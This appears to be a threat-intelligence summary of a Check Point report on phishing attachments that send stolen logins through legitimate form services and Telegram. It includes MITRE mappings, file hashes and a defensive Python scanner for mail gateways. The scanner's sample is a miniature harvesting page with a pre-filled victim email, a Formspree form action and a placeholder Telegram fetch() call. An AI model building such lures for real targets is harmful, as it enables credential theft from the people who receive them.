‘Sign in to continue’ and suffer: Attackers abusing legitimate services for credential theft – Check Point Blog

Check Point Research identified ongoing phishing campaigns that abuse legitimate form services to harvest credentials and exfiltrate data, helping attackers evade detection. The attackers rely on HTML attachments masquerading as login pages and employ services like EmailJS, Formbold, Formspree, and Formspark to capture credentials.

Key points

  • HTML attachments are a common phishing vector, often masquerading as login pages from known services.
  • Attackers exploit legitimate online form builders (EmailJS, Formbold, Formspree, Formspark) to host credential-harvesting forms.
  • Credentials submitted through these forms are sent to attackers via web servers or Telegram’s API.
  • The campaign includes thousands of emails with multiple HTML templates and urgency signals.
  • Phishing pages sometimes pre-fill the victim’s email address to look legitimate and trap credentials.
  • Check Point emphasizes protection via Threat Emulation and AI Deep Learning, and cites its phishing-prevention metrics.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – Phishing emails with HTML attachments masquerade as login pages to harvest credentials. Quote: ‘phishing emails contain a malicious URL or attachment’ and ‘HTML files are one of the most common attack vectors.’
  • [T1566.003] Phishing: Spearphishing via Service – Attackers use legitimate form services’ APIs (EmailJS, Formbold, Formspree, Formspark) to host phishing forms, making malicious HTML harder to block. Quote: ‘using a legitimate form service’s API… makes malicious HTML files harder to block.’
  • [T1567.002] Exfiltration to Web Service – The harvested credentials are sent to the attacker via web services or Telegram API. Quote: ‘the credentials are sent to the malicious actor, usually by a web-server or Telegram’s API.’
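
The pattern described above (an HTML attachment whose form posts straight to a hosted form service or to Telegram's Bot API, often with the victim's address pre-filled) can be triaged statically before the attachment ever reaches a user. The following scanner is an added example written for this summary, not code from Check Point or from the report; it uses only the Python standard library, the submission hostnames are taken from the services' public documentation and should be treated as an assumption to extend for your own environment, and the sample attachment is constructed for illustration.

```python
"""Static triage of an HTML e-mail attachment for credential-harvesting signs.

Heuristics (defender-side, deliberately not exhaustive):
  1. <form action=...> or URLs inside <script> that point at hosted form
     services (EmailJS, Formbold, Formspree, Formspark) or Telegram's Bot API.
  2. A password field on a page that arrived as an attachment.
  3. An e-mail address pre-filled into an <input value="...">.
"""
import re
from html.parser import HTMLParser

# Assumption: these are the submission hosts of the services the report names,
# per their public documentation. Extend the map for your environment.
FORM_SERVICE_HOSTS = {
    "api.emailjs.com": "EmailJS",
    "formbold.com": "Formbold",
    "formspree.io": "Formspree",
    "submit-form.com": "Formspark",
    "api.telegram.org": "Telegram Bot API",
}
URL_RE = re.compile(r"""https?://([A-Za-z0-9.-]+)[^\s"'<>]*""")
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


class AttachmentScanner(HTMLParser):
    """Collects findings while walking the attachment's HTML."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self._check_url(a["action"], "form action")
        elif tag == "input":
            if (a.get("type") or "").lower() == "password":
                self.findings.append({"kind": "password_field", "detail": a.get("name", "")})
            value = a.get("value") or ""
            if EMAIL_RE.match(value):  # pre-filled victim address
                self.findings.append({"kind": "prefilled_email", "detail": value})
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies are where fetch()/XHR exfil targets and the EmailJS SDK live.
        if self._in_script:
            for m in URL_RE.finditer(data):
                self._check_url(m.group(0), "script")
            if "emailjs.send(" in data or "emailjs.init(" in data:
                self.findings.append({"kind": "form_service", "detail": "EmailJS SDK call in script"})

    def _check_url(self, url, where):
        m = URL_RE.match(url)
        if not m:
            return
        host = m.group(1).lower()
        for known, name in FORM_SERVICE_HOSTS.items():
            if host == known or host.endswith("." + known):
                self.findings.append({"kind": "form_service", "detail": f"{name} via {where}: {url}"})


def scan_attachment(html):
    """Return a list of {'kind', 'detail'} findings for one HTML attachment."""
    p = AttachmentScanner()
    p.feed(html)
    p.close()
    return p.findings


def verdict(findings):
    """Combine findings into a triage label for the mail pipeline."""
    kinds = {f["kind"] for f in findings}
    if "form_service" in kinds and "password_field" in kinds:
        return "likely credential harvester"
    if "form_service" in kinds or "password_field" in kinds:
        return "suspicious"
    return "no indicators"


# Constructed sample attachment (not a real lure): pre-filled e-mail, password
# field, a hosted-form action and a Telegram Bot API call in script.
SAMPLE_ATTACHMENT = """<html><body>
<p>Sign in to continue</p>
<form action="https://formspree.io/f/EXAMPLEID" method="POST">
  <input type="email" name="email" value="victim@example.com">
  <input type="password" name="password">
  <button>Sign in</button>
</form>
<script>
  fetch("https://api.telegram.org/botEXAMPLE/sendMessage");
</script>
</body></html>"""

if __name__ == "__main__":
    found = scan_attachment(SAMPLE_ATTACHMENT)
    for f in found:
        print(f"{f['kind']:16} {f['detail']}")
    print("verdict:", verdict(found))
```

The scanner keys on where the form submits rather than on the look of the page, which is the property the report says makes these attachments hard to block by reputation alone: the hosts are legitimate, so a hit is a reason to detonate the file or quarantine the mail, not a block verdict by itself. Feed it the decoded HTML from each attachment in the gateway pipeline and alert on `likely credential harvester`.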

Indicators of Compromise

  • [File hash] EmailJS Samples – 053c0cd2f56b2d8276d0c5e11cbe3a5c96ec278d, d36908ce63f5386ddffaa390a0baef6a045e2254
  • [File hash] FormSpark Samples – 2c6fe45dbf760970b624b08cb1ff7bc5a5e21aa8, 56b2d8a45e34384c4eb2c886037f22c9c90f3721
  • [File hash] FormSpree Samples – b07876f8254667e0f023559eed548de7ad967941, 4c4a0d818dff16566e4bbad0d3e3fbba18e7063d
  • [File hash] FormBold Samples – f82fb2f5f17a5bad4a0dce32ceaea377fe78c905, 5da1c26703a80b3f8e663461ef9d612b4ccdee38

Read more: https://blog.checkpoint.com/security/sign-in-to-continue-and-suffer-attackers-abusing-legitimate-services-for-credential-theft/